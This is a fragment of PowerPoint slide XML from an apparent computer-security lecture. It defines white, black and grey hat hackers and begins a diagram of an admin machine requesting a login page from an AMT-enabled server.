          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70CD817A-035A-447A-9CB3-81124B6022F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3904247" y="-10425"/>
              <a:ext cx="3994486" cy="1048382"/>
              <a:chOff x="3645566" y="940076"/>
              <a:chExt cx="3994486" cy="1048382"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="TextBox 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{859DFC1E-E253-4289-912F-11CFDCD745E2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3645567" y="940076"/>
                <a:ext cx="3994485" cy="584775"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Subtle difference in </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="TextBox 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C96587-ABC0-4991-BA22-00208C843311}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3645566" y="1403683"/>
                <a:ext cx="3994485" cy="584775"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>eyebrow posture</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F59AEF-873B-4851-9160-B719E39F24E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6952439" y="2767260"/>
              <a:ext cx="512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DB93EC-07C2-4253-9D9D-E0F1F1A92852}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7465397" y="1003986"/>
              <a:ext cx="0" cy="1806099"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6C6DBD-28C3-409C-BF45-D241B003288F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8824298" y="3888573"/>
            <a:ext cx="680649" cy="714872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8456B4A-C664-44BE-8CE0-1B201E779F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5439415" y="3901788"/>
            <a:ext cx="680649" cy="714872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{246969D9-0243-4962-8727-A24570909A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166824" y="3901788"/>
            <a:ext cx="680649" cy="714872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8711F6B6-6491-4D08-AAFA-6C7AC666960B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8157400" y="-10425"/>
            <a:ext cx="3994486" cy="4395215"/>
            <a:chOff x="8157400" y="-10425"/>
            <a:chExt cx="3994486" cy="4395215"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="Group 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91176258-113F-4F8A-8838-F646C15E9ECD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8157400" y="-10425"/>
              <a:ext cx="3994486" cy="1048382"/>
              <a:chOff x="3645566" y="940076"/>
              <a:chExt cx="3994486" cy="1048382"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="TextBox 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA31BD6-5573-45F2-BBC5-B1ACF06AA2F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3645567" y="940076"/>
                <a:ext cx="3994485" cy="584775"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Always be a hipster</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="TextBox 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B7FB84-7233-4C6B-B6C5-847A2534BC4D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3645566" y="1403683"/>
                <a:ext cx="3994485" cy="584775"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>and use a Mac</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Arrow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F165C1-A45C-4F76-890A-57667514A146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10433235" y="4348694"/>
              <a:ext cx="1032812"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0C1385-3B92-4117-9B0B-4CB1880495B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11443840" y="961162"/>
              <a:ext cx="0" cy="3423628"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">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26779183-201F-4AD2-A565-A313002C8ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216567" y="4920916"/>
            <a:ext cx="11706727" cy="1937084"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The terms are inspired by old cowboy movies, where the villains wear black hats and the heroes wear white hats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>White hats: Security researchers who actively try to help society (e.g., by informing companies of vulnerabilities before disclosing those vulnerabilities)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51034A9-8218-48C5-A470-3D2DC4470313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216567" y="5746411"/>
            <a:ext cx="11706727" cy="1937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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Black hats: The people who create ransomware, send phishing emails, etc. for selfish criminal gain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FFDB1C6-08F1-4A4E-8985-BE569A9B2F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216565" y="5746410"/>
            <a:ext cx="11706727" cy="1118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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Grey hats: Hackers with more complicated motives (e.g., hacktivism by Anonymous)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16324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xEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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9">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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32">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="43"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCFA387-7B18-4B85-8286-88F4CE36FEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9228223" y="1367311"/>
            <a:ext cx="2926218" cy="3834610"/>
            <a:chOff x="8959719" y="3047320"/>
            <a:chExt cx="2926218" cy="3834610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3919E42C-9578-4C62-9394-D6307504B969}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="9351321" y="3047320"/>
              <a:ext cx="2265125" cy="2879265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A8E483-133F-4975-9344-329D42AC3E18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8959719" y="5823263"/>
              <a:ext cx="2926218" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>AMT-enabled</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E105D6-1C85-43F6-B54E-DB9D9BC4818A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8988959" y="6235599"/>
              <a:ext cx="2776661" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56D3D7B-E059-4250-979F-32D5FC7AD569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="73399" y="1511695"/>
            <a:ext cx="2926218" cy="3099108"/>
            <a:chOff x="217778" y="1511695"/>
            <a:chExt cx="2926218" cy="3099108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1026" name="Picture 2" descr="Image result for laptop icon">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2443C52-2C64-432D-B1F3-80273CD91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78" y="1511695"/>
              <a:ext cx="2668501" cy="20857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E340A5-D475-4696-ABB7-EACBEDEF0FE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="217778" y="3552136"/>
              <a:ext cx="2926218" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Admin</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6387F1DC-7B60-4DE4-9FAA-63DE8C4E0C70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="283114" y="3964472"/>
              <a:ext cx="2776661" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>machine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D95E649-B02C-46D5-AFC0-DE819A3AAE7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2948324" y="970229"/>
            <a:ext cx="6427441" cy="654032"/>
            <a:chOff x="2900196" y="970229"/>
            <a:chExt cx="6427441" cy="654032"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="5" name="Straight Arrow Connector 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F7336D-2B54-4916-80FC-6EDF0BADEA6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2900196" y="1624261"/>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617EF5-AE4F-4846-A422-30620CCBD514}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3775094" y="970229"/>
              <a:ext cx="4641812" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>HTTP GET /logon.htm </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08ED129-5835-4417-B9EE-B62F2868E218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2948324" y="1705062"/>
            <a:ext cx="6427441" cy="661150"/>
            <a:chOff x="2900196" y="1705062"/>
            <a:chExt cx="6427441" cy="661150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5E0F43-4B47-4F80-8F99-FCCE622648D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2900196" y="2366212"/>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B3BB0C0-F93D-44A6-9957-517CC52865A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3059775" y="1705062"/>
              <a:ext cx="6232029" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
